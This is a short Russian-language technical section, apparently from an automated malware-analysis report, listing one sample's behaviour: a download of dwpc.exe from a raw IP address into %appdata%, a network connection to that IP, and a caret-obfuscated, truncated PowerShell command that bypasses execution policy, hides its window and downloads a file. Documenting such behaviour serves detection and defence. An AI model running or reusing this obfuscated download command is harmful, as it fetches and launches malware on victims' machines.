Техническая информация
- http://84.200.4.102/dwpc.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwERs^HeLL.E^x^E -ExeCU^tiO^npO^l^I^Cy^ BYp^ASs^ -nO^pROFIl^e ^-w^I^Nd^Ow^S^Ty^L^E^ HidD^en (^nEW-^OB^jE^c^t ^s^yStEM.net^.W^eBc^LIe^nT).dowNL^OA^D^fILE^(^'http://84.200....
- '84.##0.4.102':80
- '<SYSTEM32>\cmd.exe' /C "POwERs^HeLL.E^x^E -ExeCU^tiO^npO^l^I^Cy^ BYp^ASs^ -nO^pROFIl^e ^-w^I^Nd^Ow^S^Ty^L^E^ HidD^en (^nEW-^OB^jE^c^t ^s^yStEM.net^.W^eBc^LIe^nT).dowNL^OA^D^fILE^(^'http://84.200....' (со скрытым окном)